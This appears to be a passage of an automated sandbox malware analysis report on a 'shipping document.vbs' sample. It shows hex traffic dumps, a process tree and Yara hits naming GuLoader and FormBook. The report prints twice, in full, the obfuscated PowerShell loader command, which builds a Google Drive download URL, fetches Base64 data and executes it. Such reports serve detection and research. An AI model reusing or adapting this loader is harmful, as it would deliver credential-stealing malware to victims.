                                                            2024-04-23 05:54:09 UTC1255INData Raw: 64 7a 38 6b 0b b4 93 ab 3c 4e 61 7f db 71 27 15 c3 71 b3 e3 96 fe 06 eb 27 fb 10 47 4d e9 0a 10 e3 17 06 ac 06 24 1c 47 7a 85 e2 c5 3d 82 87 69 51 36 5d 2a e7 a6 9c 7f e7 b1 15 14 16 51 3c 5b eb e5 2f 4e c8 f5 9c ec 58 be 69 f0 5f 96 50 45 b1 2f ae 3f ae 4c 39 ce 4a 88 04 60 a7 35 04 7e 1e 8a d5 1f 6f 50 9b f4 08 89 1a ab dc 73 dd 93 65 2d c8 bc 67 00 37 36 b6 5a 81 11 f3 79 07 35 ef 63 73 00 f1 c1 68 22 42 4d e9 b7 7d 93 9e d7 5a c5 57 d8 56 b9 d8 70 c5 1e aa 0e 3e 9d 3a ee 1e 50 c2 0c 61 ce 3a bb 32 49 9d 25 03 02 0f c8 d3 60 be 8d 30 65 3e 26 32 c6 b0 77 8e 9c 54 4a d6 d4 8c 71 83 dc 1f 9f 55 86 49 76 ca a3 6c 2e 09 ee bd 46 b7 c7 40 f2 ba f9 ca f4 c6 28 ff 6b 2c a4 72 0a e8 0c e1 86 56 a6 05 77 19 a8 cc 4f 0a 0d 10 52 01 13 f7 7a ca 11 36 2d a7 3c c9
                                                            Data Ascii: dz8k<Naq'q'GM$Gz=iQ6]*Q<[/NXi_PE/?L9J`5~oPse-g76Zy5csh"BM}ZWVp>:Pa:2I%`0e>&2wTJqUIvl.F@(k,rVwORz6-<
                                                            2024-04-23 05:54:09 UTC1255INData Raw: 3e 6a 12 bc 7e dd 0d a8 81 3e 96 6f 01 59 29 96 6d 35 7d 2c a3 3a b7 b7 60 ff c8 cd 10 59 32 ed 0b 34 73 e8 5e 5b 45 a4 f6 ec f6 21 3c e2 c2 ae 93 86 45 b5 d2 ad ed 4f 30 da bd c3 ff ae bd 7a f6 5f 4e e4 0f 28 4f 97 df fb 29 07 c6 91 5d 85 0e af 1a c4 74 90 1a 3a d0 bb 9f d0 cf ec b0 45 0d f0 1c ec 2d 47 ee bf 9e 57 eb e4 f2 ca e5 7c 10 cb 08 a4 cf 79 24 13 e4 1f 9a cd 51 6c cb 79 fd cb f4 d6 c8 82 41 78 9e f2 b2 09 d7 c4 b9 39 e2 1f 7e 8f 38 a5 84 49 43 c6 c1 7d 5a d9 d5 6c 35 89 f8 7c 5f a3 1a f2 23 df 65 07 98 26 3c 77 2a e0 fb 72 2a 0f 1f c2 77 c7 d0 44 c6 bb fb ff 5a f1 e3 c3 8f d7 2c 7f 80 55 b4 f7 f3 bc 2f 99 ab f7 4e 46 fb 1e af dd 84 64 4a 7c 1b 49 40 24 6f ff 97 2c 29 c3 6e d2 e7 de e8 28 d1 92 a5 bf f0 b9 9e f1 3d 02 a6 53 39 97 8c cc 41 43 01
                                                            Data Ascii: >j~>oY)m5},:`Y24s^[E!<EO0z_N(O)]t:E-GW|y$QlyAx9~8IC}Zl5|_#e&<w*r*wDZ,U/NFdJ|I@$o,)n(=S9AC
                                                            2024-04-23 05:54:09 UTC1255INData Raw: 70 d5 8c ac 31 ab 7f 11 a2 ce 4e 0e cc 71 58 f1 b0 5a 91 06 55 41 7b e3 34 31 00 f4 08 f9 00 5d ba d2 7a 9f 28 8b 58 37 a5 bd bf d2 0a 6d 8f 90 46 35 01 88 c2 c0 e4 24 d3 bb f7 8f 2b 27 d8 55 09 d5 ff 61 ff 6b d6 8d 99 78 67 89 8d 11 22 15 41 fd ec 55 45 5b 79 6d 0f 0d 2f 06 e5 a0 55 2b cb 4c 26 e9 8f 3d ab a5 81 8c 84 c4 ee b9 b8 8c dc 67 2d d3 e3 c1 f0 dd a3 7c ce 50 a9 f6 a6 8c 47 33 3b 30 21 3a 7b ec 07 55 c5 7b 37 50 11 08 cf 69 9d 22 8f 8d 9e 3f c8 9c 96 db de fd 60 2e d4 db 80 9a 4a 11 07 df 4a 29 86 c0 e3 86 7f dc 21 06 7e 90 8e 07 38 35 85 66 e7 4d dc ea 31 5b 75 b5 9b b5 36 c5 69 2e 3c d2 46 af 46 af e4 0b df d6 fd da 2a 81 bf d7 e5 19 47 07 20 ce 16 20 91 df 9c 1f 03 8a 33 98 2c 47 02 35 49 94 d0 a7 fe c8 a3 9c 41 9f d0 10 96 8a df a1 e6 1c db
                                                            Data Ascii: p1NqXZUA{41]z(X7mF5$+'Uakxg"AUE[ym/U+L&=g-|PG3;0!:{U{7Pi"?`.JJ)!~85fM1[u6i.<FF*G 3,G5IA
                                                            2024-04-23 05:54:09 UTC1255INData Raw: 17 be b1 6e 01 20 dc e8 25 41 91 a6 b9 c7 ff e0 75 15 3c 36 4e 97 d8 de 8a d6 6a 2e 4f 69 6f 5a 5a 0d 81 3b 9d dd ae 9e 9d 8d 82 fb cb 3c 84 c0 5e 84 e9 e3 86 0c f0 7a 4b 96 73 74 16 e8 ea f4 ea 83 28 13 64 8d 2a 5e 8a da ff bc e9 af 81 40 df fb 37 d8 93 b0 98 fc 7d a2 fc fa 39 df 80 7e 7d 60 bd 13 51 c4 0e b7 e3 5b 60 e5 ae 36 9f 26 8d 1b 2a 9c 95 82 7b 50 9a 7b e3 54 56 2f 8a 1e 4e 8d 42 45 6e c1 df fb fd 70 9c c1 60 eb 71 bb 9b 64 a4 51 74 ce 46 12 0f ec 14 a5 04 27 ae 4b b7 5b 24 99 62 3f 83 d5 c4 d4 a4 0e 43 66 94 e1 dd 6f 49 33 ea a2 9f db 11 73 bc 8a 26 28 b5 d8 75 52 41 16 70 85 f8 41 31 65 37 51 25 bb e3 ad a2 59 9d b2 4c f7 b1 1e 95 d2 a7 a1 65 8e 65 8f d3 8e 2b 63 47 00 a4 19 a2 a3 8e a6 f4 33 51 da 49 b9 92 45 2f 01 70 f9 0d 75 96 8c 8a ae 56
                                                            Data Ascii: n %Au<6Nj.OioZZ;<^zKst(d*^@7}9~}`Q[`6&*{P{TV/NBEnp`qdQtF'K[$b?CfoI3s&(uRApA1e7Q%YLee+cG3QIE/puV


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:07:53:22
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
                                                            Imagebase:0x7ff73d400000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:07:53:24
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff72d8c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:3
                                                            Start time:07:53:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;"
                                                            Imagebase:0x7ff760310000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:07:53:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff70f010000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:07:53:37
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
                                                            Imagebase:0x7ff6936b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:07:53:45
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit .nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:07:53:46
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
                                                            Imagebase:0xc50000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:07:54:01
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:07:54:02
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
